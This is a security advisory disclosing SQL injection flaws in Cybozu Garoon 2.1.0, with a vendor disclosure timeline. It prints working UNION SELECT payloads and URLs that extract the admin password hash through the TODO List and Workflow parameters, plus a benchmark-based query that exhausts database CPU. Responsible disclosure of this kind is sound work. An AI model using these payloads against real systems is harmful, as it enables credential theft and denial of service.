Some SQL injection vulnerabilities have been found in Cybozu Garoon 2. When exploited by a logon user, the vulnerabilities allow manipulation of SQL statements which can lead to disclosure of information from the database, or to cause the backend MySQL database to consume large amount of CPU resources.
Tested Versions
Cybozu Garoon 2 Version 2.1.0 for Windows
Details
This advisory discloses several SQL injection vulnerabilities in Cybozu Garoon 2.
1) TODO List View/Modify SQL Injection
Cybozu Garoon 2 does not properly sanitise the "tid" parameter in the TODO List View and Modify functionality. It is possible for a logon user to exploit this vulnerability to select values from arbitrary tables in the database.
When logon as a normal user:
TESTING NOTE a - In order for the examples to work, you must first logon as a user, then click on the TODO List link (icon) to go to the TODO List index page, before using the exploit.
TESTING NOTE b - Example 2 requires that at least 1 TODO List category has been created (category value 1).
Example 1:
To retrieve the admin user's password hash via TODO List View.
SELECT tab_grn_todo_entity._id,tab_grn_todo_entity.col_user,tab_grn_todo_entity.col_title,tab_grn_todo_entity.col_memo, tab_grn_todo_entity.col_category,tab_grn_todo_entity.col_expiration,tab_grn_todo_entity.col_limited, tab_grn_todo_entity.col_finish,tab_grn_todo_entity.col_priority,tab_grn_todo_entity.col_ctime,tab_grn_todo_entity.col_mtime FROM tab_grn_todo_entity WHERE (_id = 9999999 AND col_user = 2) LIMIT 0, 18446744073709551615 LOCK IN SHARE MODE
Manipulated Query:
SELECT tab_grn_todo_entity._id,tab_grn_todo_entity.col_user,tab_grn_todo_entity.col_title,tab_grn_todo_entity.col_memo, tab_grn_todo_entity.col_category,tab_grn_todo_entity.col_expiration,tab_grn_todo_entity.col_limited, tab_grn_todo_entity.col_finish,tab_grn_todo_entity.col_priority,tab_grn_todo_entity.col_ctime, tab_grn_todo_entity.col_mtime FROM tab_grn_todo_entity WHERE (_id = 9999999) union select 1,null,col_foreign_key,col_password,2,null,0,null,null,null,null from tab_cb_user where _id=1/* AND col_user = 2) LIMIT 0, 18446744073709551615 LOCK IN SHARE MODE
2) Workflow View/Print SQL Injection
Cybozu Garoon 2 does not properly sanitise the "pid" parameter in the Workflow View and Print functionality. It is possible for a logon user to exploit this vulnerability to select values from arbitrary tables in the database.
Example 1:
To retrieve the admin user's password hash via Workflow View.
http://192.168.1.64/scripts/cbgrn/grn.exe/workflow/view?fid=9&pid=8888888+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,col_foreign_key,14,col_password,16,17,18,19,20,21,22+from+tab_cb_user where _id=1/*
Original Query:
SELECT col_name,col_petition_number,col_user,col_user_name,col_user_foreign_key,col_status,col_form,col_form_name, col_icon_type,col_icon_id,col_icon_url,col_transactor,col_transactor_name,col_transactor_foreign_key,col_comment, col_ptime,col_reapply,col_creator,col_creator_name,col_creator_foreign_key,col_ctime,_id FROM tab_grn_workflow_petition WHERE _id = 8888888 LIMIT 0, 1 LOCK IN SHARE MODE
Manipulated Query:
SELECT col_name,col_petition_number,col_user,col_user_name,col_user_foreign_key,col_status,col_form,col_form_name, col_icon_type,col_icon_id,col_icon_url,col_transactor,col_transactor_name,col_transactor_foreign_key,col_comment, col_ptime,col_reapply,col_creator,col_creator_name,col_creator_foreign_key,col_ctime,_id FROM tab_grn_workflow_petition WHERE _id = 8888888 union select 1,2,3,4,5,6,7,8,9,10,11,12,col_foreign_key,14,col_password, 16,17,18,19,20,21,22 from tab_cb_user where _id=1/* LIMIT 0, 1 LOCK IN SHARE MODE
Example 2:
To retrieve the admin user's password hash via Workflow Print.
http://192.168.1.64/scripts/cbgrn/grn.exe/workflow/print?fid=9&pid=7777777+union+select+col_password,2,3,4, col_foreign_key,6,7,8,9,10,11,12,13,14,15,16,17,18+from+tab_cb_user where _id=1/*
Note: In order for example 2 to work, "fid" must be a valid folder ID.
Original Query:
SELECT col_name,col_petition_number,col_user,col_status,col_form_name,col_icon_type,col_icon_id,col_icon_url, col_transactor,col_transactor_name,col_transactor_foreign_key,col_ptime,col_reapply,col_creator,col_creator_name ,col_creator_foreign_key,col_ctime,_id FROM tab_grn_workflow_petition WHERE _id = 7777777 LIMIT 0, 1 LOCK IN SHARE MODE
Manipulated Query:
SELECT col_name,col_petition_number,col_user,col_status,col_form_name,col_icon_type,col_icon_id,col_icon_url, col_transactor,col_transactor_name,col_transactor_foreign_key,col_ptime,col_reapply,col_creator,col_creator_name ,col_creator_foreign_key,col_ctime,_id FROM tab_grn_workflow_petition WHERE _id = 7777777 union select col_password,2,3,4,col_foreign_key,6,7,8,9,10,11,12,13,14,15,16,17,18 from tab_cb_user where _id=1/* LIMIT 0, 1 LOCK IN SHARE MODE
3) Other SQL Injection Vulnerabilities
Several other SQL injection vulnerabilities exists. These may e.g. be exploited to cause the MySQL-based Cybozu Database Engine to consume large amount of CPU resources, potentially causing a DoS.
SELECT tab_grn_todo_categoryentity._id,tab_grn_todo_categoryentity.col_user,tab_grn_todo_categoryentity.col_title, tab_grn_todo_categoryentity.col_list_index,tab_grn_todo_categoryentity.col_ctime,tab_grn_todo_categoryentity.col_mtime FROM tab_grn_todo_categoryentity WHERE (_id = 9999999 and AND col_user = 2) LIMIT 0, 18446744073709551615 LOCK IN SHARE MODE
Manipulated Query:
This request can potentially cause MySQL to consume large amount of CPU resources.
SELECT tab_grn_todo_categoryentity._id,tab_grn_todo_categoryentity.col_user,tab_grn_todo_categoryentity.col_title, tab_grn_todo_categoryentity.col_list_index,tab_grn_todo_categoryentity.col_ctime,tab_grn_todo_categoryentity.col_mtime FROM tab_grn_todo_categoryentity WHERE (_id = 9999999) ORDER BY _id,rand(benchmark(1000000000000,sha1(123456781234567812345678)))/* AND col_user = 2) LIMIT 0, 18446744073709551615 LOCK IN SHARE MODE
2006-07-04 - Vulnerability Discovered.
2006-07-13 - Initial Vendor Notification.
2006-07-13 - Initial Vendor Reply.
2006-07-14 - Received scheduled patch release date from vendor.
2006-08-16 - Received notification that patch release will be delayed.
2006-08-25 - Vendor released patch information on website.
2006-08-28 - Public Disclosure.
2006-08-31 - Corrected spelling error in product name.
Contact
For further enquries, comments, suggestions or bug reports, simply email them to
Summary
